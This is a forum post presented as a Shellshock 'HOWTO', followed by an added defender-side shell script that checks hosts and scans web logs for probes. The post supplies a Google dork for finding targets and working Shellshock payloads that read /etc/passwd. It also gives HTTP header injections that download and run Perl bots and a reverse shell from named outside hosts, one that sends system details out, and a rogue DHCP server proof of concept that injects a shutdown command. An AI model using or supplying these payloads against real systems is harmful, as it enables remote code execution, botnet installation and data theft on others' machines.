
Author: AnakinSkywalker (Linux User Group)
BASH SHELLSHOCK INFO :P ( Howto)
« on: September 30, 2014, 10:39:34 PM »
Bash ShellShock: Info (HOWTO)
1.) Vulnerable:
XMPP (ejabberd), Mailman, MySQL, NFS, Bind9, Procmail, Exim

2.)Google dork search: (Affecting VPN SSL)
Google Search inurl:inurl:/dana-na/auth/url_default/welcome.cgi

3.) Source
() { 0v3r1d3;};echo \x22Content-type: text/plain\x22; echo; uname -a;
() { :;}; echo 'Shellshock: Vulnerable'
() { :;};echo content-type:text/plain;echo;echo [random string];echo;exit

() { :;}; /bin/bash -c "echo testing[number]"; /bin/uname -a\x0a\x0a

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 \x22() { test;};echo \x5C\x22Content-type: text/plain\x5C\x22; echo; echo; /bin/cat /etc/passwd\x22 http://[IP address]/cgi-bin/test.cgi

) { :;}; /bin/bash -c \x22wget -U BashNslash.http://isc.sans.edu/diary/Update+on+CVE-2014-6271:+Vulnerability+in+bash+(shellshock)/18707 89.248.172.139\x22

4.) Bots using the shellshock vulnerability:

This one installs a simple Perl bot that connects to irc.hacker-newbie.org port 6667, channel #bug.

() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; curl -O http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt ; lwp-download http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ;rm -rf /tmp/xrt ; wget http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; curl -O http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt ; lwp-download http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ;rm -rf /tmp/xrt ; wget http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt')\x22;

5.) Vulnerability checks using multiple headers:

GET / HTTP/1.0
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3
Accept: */*
Cookie: () { :; }; ping -c 3 [ipaddress]
Host: () { :; }; ping -c 3 [ipaddress]
Referer: () { :; }; ping -c 3 [ipaddress]

6.) Using Multiple headers to install perl reverse shell (shell connects to 46.246.34.82 port 1992 in this case)

GET / HTTP/1.1
Host: [ip address]
Cookie:() { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awardspace.com/auth; /usr/bin/perl /tmp/auth.pl
Referer:() { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awardspace.com/auth; /usr/bin/perl /tmp/auth.pl

7.) Using User-Agent to report system parameters back (the IP address is currently not responding)

GET / HTTP/1.0
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3
Host: () { :; }; wget -qO- 82.221.99.235 -U="$(uname -a)"
Cookie: () { :; }; wget -qO- 82.221.99.235 -U="$(uname -a)"

8.) User-Agent used to install perl box

GET / HTTP/1.0
Host: [ip address]
User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*

Testing for exploit:
env X='() { :; }; echo " vulnerable"' bash -c id

(Second exploit test) Creates a file named echo in the cwd with the date in it, if vulnerable:
env X='() { (a)=>\' bash -c "echo date"; cat echo

(Third exploit test)
bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo " vulnerable, redir_stack"

(Fourth exploit test)
(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"

(A simple Perl script to test a host for the exploit bug)

#!/usr/bin/perl
# largely purloined from http://www.perlmonks.org/?node_id=1093916 as my PoC for the old options overflow proved too messy^wPerlish to rework - [machine]
#
# Minimal rogue DHCP server: answers a DHCPDISCOVER with an OFFER whose
# host-name and domain-name options carry a bash function definition, which
# an unpatched bash on the client imports when the DHCP client hooks run.

use strict;
use warnings;

use IO::Socket;
use Net::DHCP::Packet;
use Net::DHCP::Constants;

my $server_ip   = "10.10.10.1";
my $client_ip   = "10.10.10.10";
my $subnet_mask = "255.255.255.0";

# Listen for broadcast client traffic on the DHCP server port.
my $socket_in = IO::Socket::INET->new(
    LocalPort => 67,
    LocalAddr => "255.255.255.255",
    Proto     => 'udp',
) or die $@;

while (1) {
    my $buf;
    $socket_in->recv($buf, 4096);
    my $packet      = Net::DHCP::Packet->new($buf);
    my $messagetype = $packet->getOptionValue(DHO_DHCP_MESSAGE_TYPE());
    if ($messagetype eq DHCPDISCOVER()) {
        send_offer($packet);
    } elsif ($messagetype eq DHCPREQUEST()) {
        send_ack($packet);
    }
}

sub send_offer {
    # List assignment: the original "my $request = @_" stored the argument
    # count instead of the packet object, so every $request->method() died.
    my ($request) = @_;
    my $socket_out = IO::Socket::INET->new(
        PeerPort  => 68,
        PeerAddr  => "255.255.255.255",
        LocalAddr => "$server_ip:67",
        Broadcast => 1,
        Proto     => 'udp',
    ) or die $@;
    my $offer = Net::DHCP::Packet->new(
        Op     => BOOTREPLY(),
        Xid    => $request->xid(),
        Flags  => $request->flags(),
        Ciaddr => $request->ciaddr(),
        Yiaddr => $client_ip,
        Siaddr => $server_ip,
        Giaddr => $request->giaddr(),
        Chaddr => $request->chaddr(),
        DHO_DHCP_MESSAGE_TYPE() => DHCPOFFER(),
    );
    $offer->addOptionValue(DHO_SUBNET_MASK(),  $subnet_mask);
    $offer->addOptionValue(DHO_NAME_SERVERS(), $server_ip);
    $offer->addOptionValue(DHO_HOST_NAME(),    "() { :; }; shutdown");
    $offer->addOptionValue(DHO_DOMAIN_NAME(),  "() { :; }; shutdown");
    $socket_out->send($offer->serialize()) or die $!;
    print STDERR "sent offer\n";
}

sub send_ack {
    # The PoC never completes the exchange; the OFFER already carries the option.
    print STDERR "send ack\n";
}
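Two defender-side checks that the material above calls for, written as an added example that is not part of AnakinSkywalker's post: the host tests under "Testing for exploit" wrapped into functions that report patched or vulnerable, and a scan of web-server log lines for the "() {" function-definition marker that every probe in sections 3 to 8 carries. The log lines are constructed for the example and the function names are my own; the checks assume a POSIX sh with grep, cut, sort and mktemp available.

```shell
#!/bin/sh
# Added example (not from the original post): defender-side Shellshock checks.
# Part 1 wraps the host tests the post lists; part 2 scans web logs for probes.

# Patched bash ignores a function definition smuggled in through the
# environment, so nothing reaches stdout. A vulnerable bash runs the trailing
# "echo vulnerable" while importing X.
shellshock_env_import() {
  command -v bash >/dev/null 2>&1 || { echo "no bash"; return 0; }
  out=$(env X='() { :; }; echo vulnerable' bash -c 'true' 2>/dev/null || true)
  case "$out" in
    *vulnerable*) echo "vulnerable" ;;
    *)            echo "patched" ;;
  esac
}

# The post's second test: on an unpatched bash the dangling redirection leaks
# out of the function body and a file named "echo" appears in the working
# directory. Run it in a scratch directory so a vulnerable host does not
# litter the cwd.
shellshock_parser_leak() {
  command -v bash >/dev/null 2>&1 || { echo "no bash"; return 0; }
  scratch=$(mktemp -d)
  ( cd "$scratch" && env X='() { (a)=>\' bash -c "echo date" >/dev/null 2>&1 ) || true
  if [ -e "$scratch/echo" ]; then echo "vulnerable"; else echo "patched"; fi
  rm -rf "$scratch"
}

# Constructed Apache combined-format lines standing in for a real access log.
# Two carry the marker in header fields Apache logs by default (Referer and
# User-Agent); the other two are ordinary traffic.
sample_log() {
  cat <<'EOF'
203.0.113.7 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/test.cgi HTTP/1.0" 200 612 "-" "() { :; }; /bin/bash -c \"uname -a\""
198.51.100.3 - - [25/Sep/2014:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 2326 "-" "Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3"
203.0.113.7 - - [25/Sep/2014:10:01:09 +0000] "GET / HTTP/1.0" 200 612 "() { :;}; ping -c 3 198.51.100.9" "curl/7.30.0"
192.0.2.44 - - [25/Sep/2014:10:02:00 +0000] "GET /cgi-bin/status HTTP/1.1" 404 208 "-" "python-requests/2.4.1"
EOF
}

# Print every line on stdin that contains a bash function-definition marker.
# The pattern tolerates the spacing variants seen in the post:
# "() { :; }", "() { :;}", "() { test;}" and "(){".
scan_shellshock_probes() {
  grep -E '\(\)[[:space:]]*\{'
}

# Number of probe lines on stdin (prints 0 rather than failing on a clean log).
count_shellshock_probes() {
  scan_shellshock_probes | grep -c . || true
}

# Distinct client addresses that sent a probe, for blocking or follow-up.
probe_sources() {
  scan_shellshock_probes | cut -d' ' -f1 | sort -u
}

# Stand-alone run: report host status, then summarise the constructed log.
echo "env import:    $(shellshock_env_import)"
echo "parser leak:   $(shellshock_parser_leak)"
echo "probe lines:   $(sample_log | count_shellshock_probes)"
echo "probe sources: $(sample_log | probe_sources)"
```

Feed a real log with `scan_shellshock_probes < /var/log/apache2/access.log`. The default combined LogFormat records only the Referer and User-Agent headers, so probes carried in Cookie or Host (sections 5 to 7 above) never reach the log unless those headers are added to the LogFormat (for example with `%{Cookie}i`) or an inline WAF or IDS inspects the raw request.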